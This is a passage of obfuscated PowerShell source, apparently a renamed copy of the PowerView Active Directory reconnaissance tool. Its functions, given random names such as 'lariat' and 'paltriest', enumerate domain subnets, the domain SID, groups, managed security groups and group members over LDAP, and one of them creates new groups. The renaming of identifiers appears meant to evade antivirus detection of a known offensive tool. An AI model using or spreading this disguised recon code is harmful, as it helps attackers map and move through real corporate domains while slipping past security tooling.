if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['SecurityMasks']) { $ufgcNRNN99['SecurityMasks'] = $FaXdBAYg99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$VvhgvVRK99 = Richelieu @SearcherArguments | |
} | |
PROCESS { | |
if ($VvhgvVRK99) { | |
$btfCLlYC99 = '' | |
$IUDzHsEr99 = '' | |
$mxWgOMSt99 | Where-Object {$_} | ForEach-Object { | |
$KzBFOtcK99 = $_.Replace('(', '\28').Replace(')', '\29') | |
if ($KzBFOtcK99 -match '^CN=.*') { | |
$btfCLlYC99 += "(distinguishedname=$KzBFOtcK99)" | |
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { | |
$wXLTskQJ99 = $KzBFOtcK99.SubString($KzBFOtcK99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
Write-Verbose "[Wesak] Extracted domain '$wXLTskQJ99' from '$KzBFOtcK99'" | |
$ufgcNRNN99['Domain'] = $wXLTskQJ99 | |
$VvhgvVRK99 = Richelieu @SearcherArguments | |
if (-not $VvhgvVRK99) { | |
Write-Warning "[Wesak] Unable to retrieve domain searcher for '$wXLTskQJ99'" | |
} | |
} | |
} | |
else { | |
try { | |
$jjIYltxr99 = (-Join (([Guid]$KzBFOtcK99).ToByteArray() | ForEach-Object {$_.ToString('X').PadLeft(2,'0')})) -Replace '(..)','\$1' | |
$btfCLlYC99 += "(objectguid=$jjIYltxr99)" | |
} | |
catch { | |
$btfCLlYC99 += "(name=$KzBFOtcK99)" | |
} | |
} | |
} | |
if ($btfCLlYC99 -and ($btfCLlYC99.Trim() -ne '') ) { | |
$IUDzHsEr99 += "(|$btfCLlYC99)" | |
} | |
if ($PSBoundParameters['LDAPFilter']) { | |
Write-Verbose "[Wesak] Using additional LDAP filter: $hzaXgjDv99" | |
$IUDzHsEr99 += "$hzaXgjDv99" | |
} | |
$VvhgvVRK99.filter = "(&(objectCategory=subnet)$IUDzHsEr99)" | |
Write-Verbose "[Wesak] Wesak filter string: $($VvhgvVRK99.filter)" | |
if ($PSBoundParameters['FindOne']) { $hCEVDJUr99 = $VvhgvVRK99.FindOne() } | |
else { $hCEVDJUr99 = $VvhgvVRK99.FindAll() } | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
if ($PSBoundParameters['Raw']) { | |
$KZWkgNYL99 = $_ | |
} | |
else { | |
$KZWkgNYL99 = epicure -nmZxBYze99 $_.Properties | |
} | |
$KZWkgNYL99.PSObject.TypeNames.Insert(0, 'PowerView.Subnet') | |
if ($PSBoundParameters['SiteName']) { | |
if ($KZWkgNYL99.properties -and ($KZWkgNYL99.properties.siteobject -like "*$ZbNKanPP99*")) { | |
$KZWkgNYL99 | |
} | |
elseif ($KZWkgNYL99.siteobject -like "*$ZbNKanPP99*") { | |
$KZWkgNYL99 | |
} | |
} | |
else { | |
$KZWkgNYL99 | |
} | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[Wesak] Error disposing of the Results object: $_" | |
} | |
} | |
$VvhgvVRK99.dispose() | |
} | |
} | |
} | |
function escarpment { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType([String])] | |
[CmdletBinding()] | |
Param( | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
$ufgcNRNN99 = @{ | |
'LDAPFilter' = '(userAccountControl:1.2.840.113556.1.4.803:=8192)' | |
} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$DCSID = deputes @SearcherArguments -YIVtKGKK99 | Select-Object -First 1 -ExpandProperty objectsid | |
if ($DCSID) { | |
$DCSID.SubString(0, $DCSID.LastIndexOf('-')) | |
} | |
else { | |
Write-Verbose "[escarpment] Error extracting domain SID for '$ADDDGomQ99'" | |
} | |
} | |
function lariat { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] | |
[OutputType('PowerView.Group')] | |
[CmdletBinding(DefaultParameterSetName = 'AllowDelegation')] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] | |
[String[]] | |
$mxWgOMSt99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('UserName')] | |
[String] | |
$AquLEsHm99, | |
[Switch] | |
$IhhlpNvL99, | |
[ValidateSet('DomainLocal', 'NotDomainLocal', 'Global', 'NotGlobal', 'Universal', 'NotUniversal')] | |
[Alias('Scope')] | |
[String] | |
$BlzSIwIq99, | |
[ValidateSet('Security', 'Distribution', 'CreatedBySystem', 'NotCreatedBySystem')] | |
[String] | |
$YcILRgLi99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[String[]] | |
$nmZxBYze99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] | |
[String] | |
$FaXdBAYg99, | |
[Switch] | |
$DPTKXMKA99, | |
[Alias('ReturnOne')] | |
[Switch] | |
$YIVtKGKK99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty, | |
[Switch] | |
$Raw | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Properties']) { $ufgcNRNN99['Properties'] = $nmZxBYze99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['SecurityMasks']) { $ufgcNRNN99['SecurityMasks'] = $FaXdBAYg99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$rIAWkoat99 = Richelieu @SearcherArguments | |
} | |
PROCESS { | |
if ($rIAWkoat99) { | |
if ($PSBoundParameters['MemberIdentity']) { | |
if ($ufgcNRNN99['Properties']) { | |
$NTHXqpRB99 = $ufgcNRNN99['Properties'] | |
} | |
$ufgcNRNN99['Identity'] = $AquLEsHm99 | |
$ufgcNRNN99['Raw'] = $True | |
sniffling @SearcherArguments | ForEach-Object { | |
$LglfdKSE99 = $_.GetDirectoryEntry() | |
$LglfdKSE99.RefreshCache('tokenGroups') | |
$LglfdKSE99.TokenGroups | ForEach-Object { | |
$lPPRfzla99 = (New-Object System.Security.Principal.SecurityIdentifier($_,0)).Value | |
if ($lPPRfzla99 -notmatch '^S-1-5-32-.*') { | |
$ufgcNRNN99['Identity'] = $lPPRfzla99 | |
$ufgcNRNN99['Raw'] = $False | |
if ($NTHXqpRB99) { $ufgcNRNN99['Properties'] = $NTHXqpRB99 } | |
$Group = sniffling @SearcherArguments | |
if ($Group) { | |
$Group.PSObject.TypeNames.Insert(0, 'PowerView.Group') | |
$Group | |
} | |
} | |
} | |
} | |
} | |
else { | |
$btfCLlYC99 = '' | |
$IUDzHsEr99 = '' | |
$mxWgOMSt99 | Where-Object {$_} | ForEach-Object { | |
$KzBFOtcK99 = $_.Replace('(', '\28').Replace(')', '\29') | |
if ($KzBFOtcK99 -match '^S-1-') { | |
$btfCLlYC99 += "(objectsid=$KzBFOtcK99)" | |
} | |
elseif ($KzBFOtcK99 -match '^CN=') { | |
$btfCLlYC99 += "(distinguishedname=$KzBFOtcK99)" | |
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { | |
$wXLTskQJ99 = $KzBFOtcK99.SubString($KzBFOtcK99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
Write-Verbose "[lariat] Extracted domain '$wXLTskQJ99' from '$KzBFOtcK99'" | |
$ufgcNRNN99['Domain'] = $wXLTskQJ99 | |
$rIAWkoat99 = Richelieu @SearcherArguments | |
if (-not $rIAWkoat99) { | |
Write-Warning "[lariat] Unable to retrieve domain searcher for '$wXLTskQJ99'" | |
} | |
} | |
} | |
elseif ($KzBFOtcK99 -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { | |
$jjIYltxr99 = (([Guid]$KzBFOtcK99).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' | |
$btfCLlYC99 += "(objectguid=$jjIYltxr99)" | |
} | |
elseif ($KzBFOtcK99.Contains('\')) { | |
$iDLAGYJo99 = $KzBFOtcK99.Replace('\28', '(').Replace('\29', ')') | plagiarist -sVUXjDxI99 Canonical | |
if ($iDLAGYJo99) { | |
$XOptDUKd99 = $iDLAGYJo99.SubString(0, $iDLAGYJo99.IndexOf('/')) | |
$ekAEczJN99 = $KzBFOtcK99.Split('\')[1] | |
$btfCLlYC99 += "(samAccountName=$ekAEczJN99)" | |
$ufgcNRNN99['Domain'] = $XOptDUKd99 | |
Write-Verbose "[lariat] Extracted domain '$XOptDUKd99' from '$KzBFOtcK99'" | |
$rIAWkoat99 = Richelieu @SearcherArguments | |
} | |
} | |
else { | |
$btfCLlYC99 += "(|(samAccountName=$KzBFOtcK99)(name=$KzBFOtcK99))" | |
} | |
} | |
if ($btfCLlYC99 -and ($btfCLlYC99.Trim() -ne '') ) { | |
$IUDzHsEr99 += "(|$btfCLlYC99)" | |
} | |
if ($PSBoundParameters['AdminCount']) { | |
Write-Verbose '[lariat] Searching for adminCount=1' | |
$IUDzHsEr99 += '(admincount=1)' | |
} | |
if ($PSBoundParameters['GroupScope']) { | |
$wwtnHxRG99 = $PSBoundParameters['GroupScope'] | |
$IUDzHsEr99 = Switch ($wwtnHxRG99) { | |
'DomainLocal' { '(groupType:1.2.840.113556.1.4.803:=4)' } | |
'NotDomainLocal' { '(!(groupType:1.2.840.113556.1.4.803:=4))' } | |
'Global' { '(groupType:1.2.840.113556.1.4.803:=2)' } | |
'NotGlobal' { '(!(groupType:1.2.840.113556.1.4.803:=2))' } | |
'Universal' { '(groupType:1.2.840.113556.1.4.803:=8)' } | |
'NotUniversal' { '(!(groupType:1.2.840.113556.1.4.803:=8))' } | |
} | |
Write-Verbose "[lariat] Searching for group scope '$wwtnHxRG99'" | |
} | |
if ($PSBoundParameters['GroupProperty']) { | |
$wbijtgiN99 = $PSBoundParameters['GroupProperty'] | |
$IUDzHsEr99 = Switch ($wbijtgiN99) { | |
'Security' { '(groupType:1.2.840.113556.1.4.803:=2147483648)' } | |
'Distribution' { '(!(groupType:1.2.840.113556.1.4.803:=2147483648))' } | |
'CreatedBySystem' { '(groupType:1.2.840.113556.1.4.803:=1)' } | |
'NotCreatedBySystem' { '(!(groupType:1.2.840.113556.1.4.803:=1))' } | |
} | |
Write-Verbose "[lariat] Searching for group property '$wbijtgiN99'" | |
} | |
if ($PSBoundParameters['LDAPFilter']) { | |
Write-Verbose "[lariat] Using additional LDAP filter: $hzaXgjDv99" | |
$IUDzHsEr99 += "$hzaXgjDv99" | |
} | |
$rIAWkoat99.filter = "(&(objectCategory=group)$IUDzHsEr99)" | |
Write-Verbose "[lariat] filter string: $($rIAWkoat99.filter)" | |
if ($PSBoundParameters['FindOne']) { $hCEVDJUr99 = $rIAWkoat99.FindOne() } | |
else { $hCEVDJUr99 = $rIAWkoat99.FindAll() } | |
$hCEVDJUr99 | Where-Object {$_} | ForEach-Object { | |
if ($PSBoundParameters['Raw']) { | |
$Group = $_ | |
} | |
else { | |
$Group = epicure -nmZxBYze99 $_.Properties | |
} | |
$Group.PSObject.TypeNames.Insert(0, 'PowerView.Group') | |
$Group | |
} | |
if ($hCEVDJUr99) { | |
try { $hCEVDJUr99.dispose() } | |
catch { | |
Write-Verbose "[lariat] Error disposing of the Results object" | |
} | |
} | |
$rIAWkoat99.dispose() | |
} | |
} | |
} | |
} | |
function larynx { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('DirectoryServices.AccountManagement.GroupPrincipal')] | |
Param( | |
[Parameter(Mandatory = $True)] | |
[ValidateLength(0, 256)] | |
[String] | |
$XXulWBmN99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$Name, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$YdYIUvri99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$TyFsoKwr99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
$QRmioDKX99 = @{ | |
'Identity' = $XXulWBmN99 | |
} | |
if ($PSBoundParameters['Domain']) { $QRmioDKX99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Credential']) { $QRmioDKX99['Credential'] = $KWcDeQDF99 } | |
$hrtTwEFj99 = dejection @ContextArguments | |
if ($hrtTwEFj99) { | |
$Group = New-Object -TypeName System.DirectoryServices.AccountManagement.GroupPrincipal -ArgumentList ($hrtTwEFj99.Context) | |
$Group.SamAccountName = $hrtTwEFj99.Identity | |
if ($PSBoundParameters['Name']) { | |
$Group.Name = $Name | |
} | |
else { | |
$Group.Name = $hrtTwEFj99.Identity | |
} | |
if ($PSBoundParameters['DisplayName']) { | |
$Group.DisplayName = $YdYIUvri99 | |
} | |
else { | |
$Group.DisplayName = $hrtTwEFj99.Identity | |
} | |
if ($PSBoundParameters['Description']) { | |
$Group.Description = $TyFsoKwr99 | |
} | |
Write-Verbose "[larynx] Attempting to create group '$XXulWBmN99'" | |
try { | |
$Null = $Group.Save() | |
Write-Verbose "[larynx] Group '$XXulWBmN99' successfully created" | |
$Group | |
} | |
catch { | |
Write-Warning "[larynx] Error creating group '$XXulWBmN99' : $_" | |
} | |
} | |
} | |
function checkerboard { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[OutputType('PowerView.ManagedSecurityGroup')] | |
[CmdletBinding()] | |
Param( | |
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('Name')] | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{ | |
'LDAPFilter' = '(&(managedBy=*)(groupType:1.2.840.113556.1.4.803:=2147483648))' | |
'Properties' = 'distinguishedName,managedBy,samaccounttype,samaccountname' | |
} | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['SecurityMasks']) { $ufgcNRNN99['SecurityMasks'] = $FaXdBAYg99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
} | |
PROCESS { | |
if ($PSBoundParameters['Domain']) { | |
$ufgcNRNN99['Domain'] = $ADDDGomQ99 | |
$ShZaeqLs99 = $ADDDGomQ99 | |
} | |
else { | |
$ShZaeqLs99 = $Env:USERDNSDOMAIN | |
} | |
lariat @SearcherArguments | ForEach-Object { | |
$ufgcNRNN99['Properties'] = 'distinguishedname,name,samaccounttype,samaccountname,objectsid' | |
$ufgcNRNN99['Identity'] = $_.managedBy | |
$Null = $ufgcNRNN99.Remove('LDAPFilter') | |
$thGPCKAp99 = sniffling @SearcherArguments | |
$VclsiDLM99 = New-Object PSObject | |
$VclsiDLM99 | Add-Member Noteproperty 'GroupName' $_.samaccountname | |
$VclsiDLM99 | Add-Member Noteproperty 'GroupDistinguishedName' $_.distinguishedname | |
$VclsiDLM99 | Add-Member Noteproperty 'ManagerName' $thGPCKAp99.samaccountname | |
$VclsiDLM99 | Add-Member Noteproperty 'ManagerDistinguishedName' $thGPCKAp99.distinguishedName | |
if ($thGPCKAp99.samaccounttype -eq 0x10000000) { | |
$VclsiDLM99 | Add-Member Noteproperty 'ManagerType' 'Group' | |
} | |
elseif ($thGPCKAp99.samaccounttype -eq 0x30000000) { | |
$VclsiDLM99 | Add-Member Noteproperty 'ManagerType' 'User' | |
} | |
$kuNRXcxd99 = @{ | |
'Identity' = $_.distinguishedname | |
'RightsFilter' = 'WriteMembers' | |
} | |
if ($PSBoundParameters['Server']) { $kuNRXcxd99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $kuNRXcxd99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $kuNRXcxd99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $kuNRXcxd99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $kuNRXcxd99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $kuNRXcxd99['Credential'] = $KWcDeQDF99 } | |
$VclsiDLM99 | Add-Member Noteproperty 'ManagerCanWrite' 'UNKNOWN' | |
$VclsiDLM99.PSObject.TypeNames.Insert(0, 'PowerView.ManagedSecurityGroup') | |
$VclsiDLM99 | |
} | |
} | |
} | |
function paltriest { | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] | |
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] | |
[OutputType('PowerView.GroupMember')] | |
[CmdletBinding(DefaultParameterSetName = 'None')] | |
Param( | |
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] | |
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] | |
[String[]] | |
$mxWgOMSt99, | |
[ValidateNotNullOrEmpty()] | |
[String] | |
$ADDDGomQ99, | |
[Parameter(ParameterSetName = 'ManualRecurse')] | |
[Switch] | |
$qBTjdcuc99, | |
[Parameter(ParameterSetName = 'RecurseUsingMatchingRule')] | |
[Switch] | |
$LpNKjrxn99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('Filter')] | |
[String] | |
$hzaXgjDv99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('ADSPath')] | |
[String] | |
$GNYlaBrE99, | |
[ValidateNotNullOrEmpty()] | |
[Alias('DomainController')] | |
[String] | |
$CbStbNZR99, | |
[ValidateSet('Base', 'OneLevel', 'Subtree')] | |
[String] | |
$gEzbtCrD99 = 'Subtree', | |
[ValidateRange(1, 10000)] | |
[Int] | |
$uTURXKBm99 = 200, | |
[ValidateRange(1, 10000)] | |
[Int] | |
$ucLpCRIr99, | |
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')] | |
[String] | |
$FaXdBAYg99, | |
[Switch] | |
$DPTKXMKA99, | |
[Management.Automation.PSCredential] | |
[Management.Automation.CredentialAttribute()] | |
$KWcDeQDF99 = [Management.Automation.PSCredential]::Empty | |
) | |
BEGIN { | |
$ufgcNRNN99 = @{ | |
'Properties' = 'member,samaccountname,distinguishedname' | |
} | |
if ($PSBoundParameters['Domain']) { $ufgcNRNN99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['LDAPFilter']) { $ufgcNRNN99['LDAPFilter'] = $hzaXgjDv99 } | |
if ($PSBoundParameters['SearchBase']) { $ufgcNRNN99['SearchBase'] = $GNYlaBrE99 } | |
if ($PSBoundParameters['Server']) { $ufgcNRNN99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['SearchScope']) { $ufgcNRNN99['SearchScope'] = $gEzbtCrD99 } | |
if ($PSBoundParameters['ResultPageSize']) { $ufgcNRNN99['ResultPageSize'] = $uTURXKBm99 } | |
if ($PSBoundParameters['ServerTimeLimit']) { $ufgcNRNN99['ServerTimeLimit'] = $ucLpCRIr99 } | |
if ($PSBoundParameters['Tombstone']) { $ufgcNRNN99['Tombstone'] = $DPTKXMKA99 } | |
if ($PSBoundParameters['Credential']) { $ufgcNRNN99['Credential'] = $KWcDeQDF99 } | |
$RFXZSNQH99 = @{} | |
if ($PSBoundParameters['Domain']) { $RFXZSNQH99['Domain'] = $ADDDGomQ99 } | |
if ($PSBoundParameters['Server']) { $RFXZSNQH99['Server'] = $CbStbNZR99 } | |
if ($PSBoundParameters['Credential']) { $RFXZSNQH99['Credential'] = $KWcDeQDF99 } | |
} | |
PROCESS { | |
$rIAWkoat99 = Richelieu @SearcherArguments | |
if ($rIAWkoat99) { | |
if ($PSBoundParameters['RecurseUsingMatchingRule']) { | |
$ufgcNRNN99['Identity'] = $mxWgOMSt99 | |
$ufgcNRNN99['Raw'] = $True | |
$Group = lariat @SearcherArguments | |
if (-not $Group) { | |
Write-Warning "[paltriest] Error searching for group with identity: $mxWgOMSt99" | |
} | |
else { | |
$oDUyAheE99 = $Group.properties.item('samaccountname')[0] | |
$JMzFaWio99 = $Group.properties.item('distinguishedname')[0] | |
if ($PSBoundParameters['Domain']) { | |
$yZcGVRCm99 = $ADDDGomQ99 | |
} | |
else { | |
if ($JMzFaWio99) { | |
$yZcGVRCm99 = $JMzFaWio99.SubString($JMzFaWio99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
} | |
} | |
Write-Verbose "[paltriest] Using LDAP matching rule to recurse on '$JMzFaWio99', only user accounts will be returned." | |
$rIAWkoat99.filter = "(&(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$JMzFaWio99))" | |
$rIAWkoat99.PropertiesToLoad.AddRange(('distinguishedName')) | |
$aETbShlY99 = $rIAWkoat99.FindAll() | ForEach-Object {$_.Properties.distinguishedname[0]} | |
} | |
$Null = $ufgcNRNN99.Remove('Raw') | |
} | |
else { | |
$btfCLlYC99 = '' | |
$IUDzHsEr99 = '' | |
$mxWgOMSt99 | Where-Object {$_} | ForEach-Object { | |
$KzBFOtcK99 = $_.Replace('(', '\28').Replace(')', '\29') | |
if ($KzBFOtcK99 -match '^S-1-') { | |
$btfCLlYC99 += "(objectsid=$KzBFOtcK99)" | |
} | |
elseif ($KzBFOtcK99 -match '^CN=') { | |
$btfCLlYC99 += "(distinguishedname=$KzBFOtcK99)" | |
if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) { | |
$wXLTskQJ99 = $KzBFOtcK99.SubString($KzBFOtcK99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
Write-Verbose "[paltriest] Extracted domain '$wXLTskQJ99' from '$KzBFOtcK99'" | |
$ufgcNRNN99['Domain'] = $wXLTskQJ99 | |
$rIAWkoat99 = Richelieu @SearcherArguments | |
if (-not $rIAWkoat99) { | |
Write-Warning "[paltriest] Unable to retrieve domain searcher for '$wXLTskQJ99'" | |
} | |
} | |
} | |
elseif ($KzBFOtcK99 -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') { | |
$jjIYltxr99 = (([Guid]$KzBFOtcK99).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join '' | |
$btfCLlYC99 += "(objectguid=$jjIYltxr99)" | |
} | |
elseif ($KzBFOtcK99.Contains('\')) { | |
$iDLAGYJo99 = $KzBFOtcK99.Replace('\28', '(').Replace('\29', ')') | plagiarist -sVUXjDxI99 Canonical | |
if ($iDLAGYJo99) { | |
$XOptDUKd99 = $iDLAGYJo99.SubString(0, $iDLAGYJo99.IndexOf('/')) | |
$ekAEczJN99 = $KzBFOtcK99.Split('\')[1] | |
$btfCLlYC99 += "(samAccountName=$ekAEczJN99)" | |
$ufgcNRNN99['Domain'] = $XOptDUKd99 | |
Write-Verbose "[paltriest] Extracted domain '$XOptDUKd99' from '$KzBFOtcK99'" | |
$rIAWkoat99 = Richelieu @SearcherArguments | |
} | |
} | |
else { | |
$btfCLlYC99 += "(samAccountName=$KzBFOtcK99)" | |
} | |
} | |
if ($btfCLlYC99 -and ($btfCLlYC99.Trim() -ne '') ) { | |
$IUDzHsEr99 += "(|$btfCLlYC99)" | |
} | |
if ($PSBoundParameters['LDAPFilter']) { | |
Write-Verbose "[paltriest] Using additional LDAP filter: $hzaXgjDv99" | |
$IUDzHsEr99 += "$hzaXgjDv99" | |
} | |
$rIAWkoat99.filter = "(&(objectCategory=group)$IUDzHsEr99)" | |
Write-Verbose "[paltriest] paltriest filter string: $($rIAWkoat99.filter)" | |
try { | |
$jdzRPRXs99 = $rIAWkoat99.FindOne() | |
} | |
catch { | |
Write-Warning "[paltriest] Error searching for group with identity '$mxWgOMSt99': $_" | |
$aETbShlY99 = @() | |
} | |
$oDUyAheE99 = '' | |
$JMzFaWio99 = '' | |
if ($jdzRPRXs99) { | |
$aETbShlY99 = $jdzRPRXs99.properties.item('member') | |
if ($aETbShlY99.count -eq 0) { | |
$bYdyzcRf99 = $False | |
$VwGNveYC99 = 0 | |
$Top = 0 | |
while (-not $bYdyzcRf99) { | |
$Top = $VwGNveYC99 + 1499 | |
$eznePUsq99="member;range=$VwGNveYC99-$Top" | |
$VwGNveYC99 += 1500 | |
$Null = $rIAWkoat99.PropertiesToLoad.Clear() | |
$Null = $rIAWkoat99.PropertiesToLoad.Add("$eznePUsq99") | |
$Null = $rIAWkoat99.PropertiesToLoad.Add('samaccountname') | |
$Null = $rIAWkoat99.PropertiesToLoad.Add('distinguishedname') | |
try { | |
$jdzRPRXs99 = $rIAWkoat99.FindOne() | |
$xVwwNtmc99 = $jdzRPRXs99.Properties.PropertyNames -like "member;range=*" | |
$aETbShlY99 += $jdzRPRXs99.Properties.item($xVwwNtmc99) | |
$oDUyAheE99 = $jdzRPRXs99.properties.item('samaccountname')[0] | |
$JMzFaWio99 = $jdzRPRXs99.properties.item('distinguishedname')[0] | |
if ($aETbShlY99.count -eq 0) { | |
$bYdyzcRf99 = $True | |
} | |
} | |
catch [System.Management.Automation.MethodInvocationException] { | |
$bYdyzcRf99 = $True | |
} | |
} | |
} | |
else { | |
$oDUyAheE99 = $jdzRPRXs99.properties.item('samaccountname')[0] | |
$JMzFaWio99 = $jdzRPRXs99.properties.item('distinguishedname')[0] | |
$aETbShlY99 += $jdzRPRXs99.Properties.item($xVwwNtmc99) | |
} | |
if ($PSBoundParameters['Domain']) { | |
$yZcGVRCm99 = $ADDDGomQ99 | |
} | |
else { | |
if ($JMzFaWio99) { | |
$yZcGVRCm99 = $JMzFaWio99.SubString($JMzFaWio99.IndexOf('DC=')) -replace 'DC=','' -replace ',','.' | |
} | |
} | |
} | |
} | |
ForEach ($gPVoRuJA99 in $aETbShlY99) { | |
